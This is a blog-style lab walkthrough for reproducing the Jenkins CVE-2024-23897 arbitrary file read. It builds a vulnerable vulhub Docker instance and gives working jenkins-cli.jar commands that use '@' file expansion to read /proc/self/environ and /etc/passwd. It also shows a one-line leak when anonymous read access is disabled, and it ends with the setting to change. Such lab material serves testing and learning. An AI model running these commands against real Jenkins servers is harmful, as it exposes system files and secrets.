How to replicate Jenkins CVE-2024–23897: Arbitrary File Read Vulnerability

In this story, I’ll guide you through effortlessly replicating the latest Jenkins-related CVE. But before we jump into action, let’s take a closer look at this vulnerability. 🔍🌐 Ready for the ride? Buckle up! 🚀

Jenkins uses command arguments and options through the args4j library, parsing CLI commands on the controller. The command parser, by default, swaps an ‘@’ character followed by a file path in an argument with the file’s contents using the expandAtFiles feature. This feature is enabled by default and Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable it.

It is crucial to note that when the “Allow anonymous read access” option is enabled, it gives us the ability to read the entire file. On the other hand, if it is not enabled, only the first line of the file can be accessed through a command line error. 🤔🤔🤔

Let’s Get Our Hands Dirty 💻💻

Now, let’s roll up our sleeves and build the environment. To make it happen, we’ll need:

Docker and Docker-composeKali Linux or any Linux-based systemA docker-compose.yml file [Bellow code]version: '2.2'
services:
jenkins:
image: vulhub/jenkins:2.441
ports:
- "50000:50000"
- "8080:8080"
- "5005:5005"
init: true
environment:
- DEBUG=1

To kickstart our vulnerable instance, let’s spark things up with the following command. (Default administrator’s username and password are admin and vulhub)

docker-compose -f docker-compose.yml --compatibility up -dAccess to http://localhost:8080 to verify that everything is ok.

Before to exploitation phase, you must download the Jenkins command-line client jenkins-cli.jar from http://localhost:8080/jnlpJars/jenkins-cli.jar
Be sure this file is in your current directoy

jenkins-cli.jar

Exploitation time 🥷💻

Now to see how this works run the follow command

java -jar jenkins-cli.jar -s http://localhost:8080/ -http connect-node "@/proc/self/environ"@/proc/self/environ

let’s see the behavior if we disable “Allow anonymous read access”.

Missing Overal/Read permission

However, using the follow command, we can still read the first line.

java -jar jenkins-cli.jar -s http://localhost:8080/ -http help 1 "@/proc/self/environ"

Modifying a argument for http flag (-http), anoticeable behavior emerges when adding help 1 revealing a single line, whereas using help displays two lines.

Finally, enable again “Allow anonymous read access” to full read of /etc/passwd

/etc/passwd

To disable this option on your servers you must follow the following path and uncheck the box
Login in your Jenkin instance > Manage Jenkins > Security

Thank you very much for taking the time to read and learn with me. Feel free to send me a message if you have any questions. 🤗🤗🤗

References:
https://github.com/vulhub/vulhub/tree/574ce69bfa2292952cdc4ab0822679127dc173c2/jenkins/CVE-2024-23897
https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3314
https://mp.weixin.qq.com/s/2a4NXRkrXBDhcL9gZ3XQyw

PoC by h4x0r_dz